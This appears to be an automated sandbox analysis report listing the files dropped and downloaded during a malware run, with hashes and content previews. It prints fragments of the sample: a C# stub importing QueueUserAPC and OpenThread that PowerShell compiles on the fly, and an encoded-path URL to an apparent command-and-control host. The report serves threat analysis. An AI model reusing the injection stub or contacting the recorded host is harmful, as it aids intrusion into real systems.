                                                                                                                                      SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                      SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/httpErrorPagesScripts.js
                                                                                                                                      Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\7[1].htm
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):267700
                                                                                                                                      Entropy (8bit):5.999877808101812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:0GtBeRO1EXAR18gvZYQhlTIorpKkFqBCf:/tgROGm1qEl9rpKhi
                                                                                                                                      MD5:BF32F421FA2847FAA8DB0BE9201BA6DE
                                                                                                                                      SHA1:FD7A60D7431272DD5906940F08933E9A86A4283B
                                                                                                                                      SHA-256:FCA7FA4DFFAD605B97E30A75F5847E54E1B16D89B13C2542ACA5B1208F400F9A
                                                                                                                                      SHA-512:56E1D7C7AFF4A81EAF3209EA2F1812960260D8BDBC0DC3B3501D78C48FC978D8C431714063D98D1EEF2D88F47B32E45BD9F59596DCE4FC82DB54CFA382D32649
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7
                                                                                                                                      Preview: qrKLV7cX9FFkSZiLVGD0AujmwUS0lszsgRtLkJXbDnMxZEbQcLEMZP9AENVbi5t1P6FM9USacZ/3BMQZkHB9hoDeH08G+UQzLtWGW/dkh4vuAVlR5/L8jals82A4PsE+4rYf+6rtVVm/Ykx2kj7O4ExT5YR4wyNPx7I4rr3mAbTFDjbluYNOJjH2L0jSLyplHmE13dMJWnh23P8iX+1PV0O8nA+g4rKMGsDk17cg7Mpm2+KENW0D7aP656j+zDi4XuEwLHoKHQCMmRLzjMYa+JlQWVcojKBWJow3YO3mh4st36teMmuq7CDN0CS+UzlOCwwGLAPkNcJ5So/uRvN2b7/LAHSZ7Nz8Hyl7qLNsBFoB3AxyDWGiN35FSvAUhliKGuiWH0g+Uq2FYkTkrbjyAw50GGl7jm0NsxSNJ9QLXS2VAsJrevbFGPXTxKE5L83E5Ro75Rmw8q4M5wV2mXErc8nR+ie6oWM2B5R1ZYnhKQBcnjdp65o5Ah7KmVYWPIRfpMYWVJcafkmS8cMatpOMwp5suS4CRPoZNFUnE6lrxL61N5dBLj6RuExp5V+asqnE7A5QmA/n18LGvj6qjxKPgE65id9rxkKgba5f54YY/lYDhIP6nLfYq5xV468uVBen9rzpUXeDv3Um63c1dVJgUgTRj7BKojuJjAMrmUAa5ksECw1w7bApTFxWNccAv5sduNu6+3wyS8oHmYqNgO8gIiec04H8HnK01LGhw9SoiTerEn3c6Vu9kh40fFb/b9SR0bc/4IUDWPVDnOECj6ydXpuAL7r6b1IranAdntHu+1pUi2rpGUW9SiR6Kcw0ct5qfTyCu/13Sz4O+B1J9bC4XnrOS/Pn9doI6NQM7JdupPSfQtqo1U2FIoki0yu26nOY3p4SQAXzH+hLw69CTMH3KIRtxt92Bo/X+oktP5kOorL7VwMtzq9r5bmY3JR9uHDFnlkMFBny2+WTnyrdCZQn3m45DUQB5mTGMtL1f8Y+
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):6495
                                                                                                                                      Entropy (8bit):3.8998802417135856
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                      MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                      SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                      SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                      SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                      Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):4113
                                                                                                                                      Entropy (8bit):7.9370830126943375
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                      MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                      SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                      SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                      SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                      Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11606
                                                                                                                                      Entropy (8bit):4.883977562702998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                                                                                      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                                                                                      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                                                                                      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                                                                                      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):0.9260988789684415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: @...e................................................@..........
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.0.cs
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):402
                                                                                                                                      Entropy (8bit):5.038590946267481
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
                                                                                                                                      MD5:D318CFA6F0AA6A796C421A261F345F96
                                                                                                                                      SHA1:8CC7A3E861751CD586D810AB0747F9C909E7F051
                                                                                                                                      SHA-256:F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
                                                                                                                                      SHA-512:10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):369
                                                                                                                                      Entropy (8bit):5.313360961388429
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fe0Uzxs7+AEszIWXp+N23feSn:p37Lvkmb6KHqWZE8Pn
                                                                                                                                      MD5:2DB8879E193202C9BF2E53E6BFED2AA0
                                                                                                                                      SHA1:B70B1517052DE8E7C4936A6032542D18B2000AA0
                                                                                                                                      SHA-256:01A4228FF2F9F3B587C24468C7F3EE08DC64259C9BDC1E4FA0AD35F6BBDAB4B9
                                                                                                                                      SHA-512:495DF850BFE8CEB6CED15B037F6571F0CCBCB5B5EB3F21C2F40F3D7EE1F213CDD0BFC58E86AC054987284756E5765B4321DDDB1B71D7E4C177B27A263F6CA87B
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.0.cs"
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3584
                                                                                                                                      Entropy (8bit):2.6201282755446322
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:etGSpW/W2Dg85xL/XsB4zJL4zqhRqPPtkZfGmNn+II+ycuZhNHakSpPNnq:6xWb5xL/OGbuuJlRn1ulHa3Lq
                                                                                                                                      MD5:A5F27D62E9CA8D216BD8677A014C1E9F
                                                                                                                                      SHA1:48745A1788FDCCBF3BE6F7BEC72A926A28E1CA99
                                                                                                                                      SHA-256:623AB8A49F0ED911BF70DA44A71F47EBB1BDCE091A80B4C77EB25E60337D7451
                                                                                                                                      SHA-512:E1849B68778B01881F8E4246BEDC113CBA95F483C0C9F38EA713F31635CA121515F65939B2D38DD0316DF44E9BED84C20B293CA351411042B1D455080A2F13D8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a.......*.....3./.....6.......C.......V................................................<Module>.1453igkk.dll.tba.W32.mscorlib.Syst
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.out
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):412
                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.1156819456479257
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKfnGak7YnqqhfnXPN5Dlq5J:+RI+ycuZhNHakSpPNnqX
                                                                                                                                      MD5:52FBC8B242036E953D34FB77648B8CA7
                                                                                                                                      SHA1:44B9D1FABA6237FD3EC21C1CB5EA552BE904EB25
                                                                                                                                      SHA-256:A414B782A372D8D104F08A38DD596DA5D4F2A1A2E251EB596000D28CB6A808E2
                                                                                                                                      SHA-512:8C43DDC7C1A66790678DF83E8CC41C6DB731FFFB15EC5AD4F2DB0708DCF60D81B23853A04A0690D5B66D2F8212D8C9D280DD585DFCEC0C94ADDC165C3CF8EAB7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.4.5.3.i.g.k.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.4.5.3.i.g.k.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):89
                                                                                                                                      Entropy (8bit):4.214875319651327
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:oVXVPMfFfVQLU0qmW8JOGXnFPMfFfVQLU0Zun:o9QF9QLU0iqgF9QLU0Zu
                                                                                                                                      MD5:C761F30D7AA0B615632114F8048E36F6
                                                                                                                                      SHA1:0654CFC40DA2F1F93E8EF23E8E5BEF11ADC3FF8B
                                                                                                                                      SHA-256:429DF2245415C117E29A61D8C318D5A8037D13458A0A326208BF1058A2FB91CB
                                                                                                                                      SHA-512:1218CDFA05793495D3D26EBFBFBF759347DD4A4EC9E4660AD93262AE24D1913C583FBB0C0D7A51F6C0FCD6BD98474181F6E1847A1E577478FDBCB41320C21A03
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: [2020/11/24 21:20:05.162] Latest deploy version: ..[2020/11/24 21:20:05.162] 11.211.2 ..
                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES8664.tmp
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2184
                                                                                                                                      Entropy (8bit):2.70956465433161
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pgKLhHdVFhKdNNI+ycuZhNHakSpPNnq9qpnie9Ep:KK19VzKd31ulHa3Lq9uw
                                                                                                                                      MD5:F312FDCCB14F8E901F73C2077C51793C
                                                                                                                                      SHA1:18ADB28339D8CE374944AD74AC42447CF8595A02
                                                                                                                                      SHA-256:07DE661EE9480141E11DC5B82CC0B16B6D632C83B8FB583C4879CAA09ACACA42
                                                                                                                                      SHA-512:AB124BEA9705D985F3E573F8DC6C56DF6F3F88A2C4FE2F007022596498BC2C7EDF297DA91628EC7190EB9A27902BEE86F932226756048EF5CB8F087B75FC6BE0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP...............R..B.n.=4.wd.............4.......C:\Users\user\AppData\Local\Temp\RES8664.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES9384.tmp
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2184
                                                                                                                                      Entropy (8bit):2.7068645236556512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:bP6eRhHlhKdNNI+ycuZhNvuakScvPNnq9qpuhie9Ep:bPXDzKd31ulma3Sq93hw
                                                                                                                                      MD5:E50A6C8BC0F94622EB97ABF57EF8D1C6
                                                                                                                                      SHA1:F5735A7C74B6CF1930CB6AF6F7FCC01EF275121D
                                                                                                                                      SHA-256:D18B307D5E7E38D78D1C0D868BEF19307AA4D60CDB225537773D740C8E1AC4A1
                                                                                                                                      SHA-512:EFD48BEE39D7279CCDEBB0E867740D75D99A9053403E261A99C21FBA55F77BAC42618412F08C103A0A6C40685193EFCD5BA241035B3CB7F045CA30FB684A84F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ........S....c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP..................g..O....r..............4.......C:\Users\user\AppData\Local\Temp\RES9384.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvnvbiu0.gck.ps1
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 1
                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5u3jvqp.syn.psm1
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 1
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.0849692938644355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytuak7YnqqcvPN5Dlq5J:+RI+ycuZhNvuakScvPNnqX
                                                                                                                                      MD5:94D1679D1D4FEFD1EF2E72D0E7ABF5B2
                                                                                                                                      SHA1:AAC4640124B24ED06E8D7588C04AFCC9F534D707
                                                                                                                                      SHA-256:4C6512C3975A9BC03A4D0D45FF7274B75EFA247D42475BA3252FC6C288290AD5
                                                                                                                                      SHA-512:FDA5BB5791C6634031BA7E0C3D6A98880059302323DFE0F0E3F973599C14789D7BBAE662A58E357704504C9CBAE38F429B2310AAC2332AFDEA51E7344AE4C09C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.e.r.y.0.d.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.e.r.y.0.d.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):414
                                                                                                                                      Entropy (8bit):5.000775845755204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
                                                                                                                                      MD5:216105852331C904BA5D540DE538DD4E
                                                                                                                                      SHA1:EE80274EBF645987E942277F7E0DE23B51011752
                                                                                                                                      SHA-256:408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
